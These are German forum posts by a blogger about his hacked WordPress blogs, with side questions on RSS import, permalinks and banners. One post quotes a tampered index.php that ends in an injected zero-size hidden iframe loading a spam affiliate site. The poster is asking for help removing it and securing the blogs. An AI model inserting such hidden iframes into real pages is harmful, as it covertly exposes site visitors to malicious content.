Beiträge von hansels

    Danke!

    :-D Hallo Ammaletu,

    herzlichen Dank! Problem gelöst. Auf so was bin ich noch nicht gekommen...aber nun habe ich wieder etwas gelernt. Nun sind auch alle neuen Feeds wieder geladen, nachdem ich ein ausländisches Sonderzeichen entfernt habe. Es handelte sich um ein polnisches Sonderzeichen.

    Danke!

    Grüße
    Jens

    Problem: RSS-Transfer in Joomla

    Hallo Ammaletu,

    ich habe nun noch einmal - aufgrund Deiner Frage - alles im Detail ausprobiert und notiert. Mein RSS-Reader im Firefox liest alles einwandfrei, der Feed scheint okay. Mein Joomla hingegen will den Feed seit Anfang/Mitte August nicht mehr einlesen, alle alten Einträge sind eingelesen. Nun mag es auch an Joomla liegen, das zeitlich zum Fehlereintritt passende Update war aber bei Wordpress. Könnte es an irgendeinem Format liegen, das anders eingestellt werden muss? Wahrscheinlich irgendein ganz simpler Fehler, aber ich komme einfach nicht weiter...

    Die Website, die den Feed ausgibt:
    Polen-Netzwerk
    Die Website, die den Feed einliest:
    Schönes-Polen - Reisen nach Polen. Informationen, Tipps und Angebote.

    Schon einmal Danke für die Bereitschaft zur Hilfe!

    Danke...

    Hallo Tobbis und Jottlieb,

    Danke. Nun weiß ich auch mehr über Brute-Force. Auf Wikipedia oder Google hätte ich dabei auch selbst kommen können; sorry: Hatte eine Software dahinter vermutet.

    Die erste Installation habe ich neu fertig; scheint sauber. Nun kommt die zweite. Zum Glück hatte ich die Datenbanken gesichert...

    Kurze Frage am Rande: Habe "by the way" auf aussagefähige Permalinks umgeschaltet. Nun funktionieren meine Kommentare nicht mehr, Fehler 404. Hat jemand Rat?

    Vielen Dank und viele Grüße
    Jens

    Scheint ernsthaft zu sein...

    Hallo TobbisBlog,

    Danke für die Antwort. Ich glaube nicht, dass es am FTP-Passwort liegt, da auf dem Server noch einiges mehr liegt, was für Spammer wohl interessanter wäre. Glaube ich eher nicht. Ich habe nun mal alle Dateien einzeln analysiert, und die html-a-href ist überall einfach druntergeschrieben. Scheint ein Automatismus zu sein, der irgendwie übers Template oder ein Plugin hineingekommen ist.

    Bei einem Blog habe ich nun alles bis auf die Datenbank neu installiert und das Theme nachgebaut. Scheint bisher zu klappen und spamfrei zu sein. Ist aber ein Riesenaufwand. Ich fürchte, ich komme auch beim zweiten Blog nicht darum herum...

    Was genau ist Brute-Force?

    Und: Ich hoffe, dass nichts in der DB ist. Das werde ich ja bald wissen, wenn es wieder kommt, muss ich wohl davon ausgehen.

    Kann man noch irgendwas schützend unternehmen?

    Viele Grüße
    Jens

    Wohin?

    Hallo,

    an welcher Stelle sollen die Banner denn stehen?

    1) Im Header: Kein Problem, ändere einfach das entsprechende Template und füge den html-Code (kein iframe) ein.
    2) In der Sidebar: Dito, dürfte auch so funktionieren. Allerdings ist da meist zu wenig Platz für klassische Banner.
    3) Im Artikel: Als Bild einfügen (vorher Hochladen), dann Link darauf legen.

    Ich hoffe, dass ich Dich richtig verstanden habe. Oder bietet Affilinet nur Javascript-Banner? Meist kann man doch auch html-Code und Bild getrennt bekommen - ist einfacher!

    Viele Grüße
    Jens

    Ergänzung: Wie die Trojaner-Reste beseitigen?

    Hallo noch einmal,

    trotz Updates auf die aktuelle Version wird an irgendwelchen Stellen immer noch die free20.com (Spam-Site) geladen. Man sieht davon nur etwas in der Adresszeile unten im Firefox. Gibt es einen Weg - außer der kompletten Deinstallation - diese Reste zu entfernen? Hat damit schon jemand Erfahrung?

    Muss ich jeder einzelne Datei untersuchen? Oder gibt es einen besseren Weg? Und vor allem: Wie vermeide ich so etwas in Zukunft? Über Hilfe wäre ich sehr dankbar!

    Beste Grüße
    Jens:confused:

    Hallo,

    zwei Wordpress-Blogs von mir habe ich nachlässig behandelt und seit Version 2.05 nicht aktualisiert. Das hat sich nun gerächt: Heute morgen um 4:26 Uhr hat irgendwas oder irgendwer einen Haufen Dateien überschrieben. Nach außen laufen beide Blogs (hansels.de - Ein Blog, Polen-Netzwerk) noch richtig, aber wenn ich mich in den Admin-Bereich einloggen möchte, wird eine Seite namens "free20.com" aufgerufen und ich erhalte böse Spamdinge auf meinem Bildschirm.

    Ich bin zugegeben nicht so in den Hintergründen vertraut und habe zur ersten Schadensbegrenzung erst einmal eine ältere gesicherte Version wieder aufgespielt. Nun funktioniert alles wieder, ich habe aber Angst, dass das entweder wieder passiert oder dass sogar jemand nun dauerhaft auf meine Passworte und Inhalte zugreifen kann. Was muss ich tun, damit das nicht passieren kann?

    Einschub, nachgetragen: Das habe ich im Code der index.php gefunden, ich frage mich nur, wie man die manipulieren konnte:

    Zitat

    <?php
    /* Short and sweet */
    define('WP_USE_THEMES', true);
    require('./wp-blog-header.php');
    ?><html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>

    Ich mache nun ein Update auf die aktuelle Version 2.2. Und werde das auch zukünftig weiter machen. Auch ändere ich die Passworte. Aber: Ich habe Sorge, dass noch Plugins infiziert sein könnten. Ich nutze in den Blogs:

    Akismet, CJD Spam, Follow URL, Hello Dolly, o42cleanUmlauts, TimeZone, UpdateMonitor, Database-Backup, WP-Contactform, Shortstat

    Weiterhin war ein AdSense-Tool installiert, das aber meiner ersten Einschätzung folgend für das Desaster verantwortlich war. Deswegen habe ich es entfernt. Danach stellte ich aber fest, dass offensichtlich ShortStat auch irgendwie infiziert war; bevor ich eine Datei namens Shortstat nicht löschte, erschien beim Login im Admin-Bereich immer noch die ominöse free20.com-Spamsite.

    Habe ich vielleicht irgendwo zu viele Rechte vergeben? Ich würde mich über Sicherheitstipps sehr freuen. Das geniale Wordpress habe ich bisher immer nur als ideales Instrument für einfaches Veröffentlichen gesehen und das Sicherheitsthema einfach zu sehr vernachlässigt. Nach allem, was ich hier im Forum nun dazu las, bin ich doch sehr beunruhigt; scheinbar ist es bei mir zu lange gut gegangen.

    Kann mir jemand Absicherungstipps für die Schreibrechte geben? Soll ich noch Plugins löschen? Kann ich doch beruhigter sein, als ich im Moment bin? Schon einmal vielen Dank!

    Herzliche Grüße
    Jens:confused: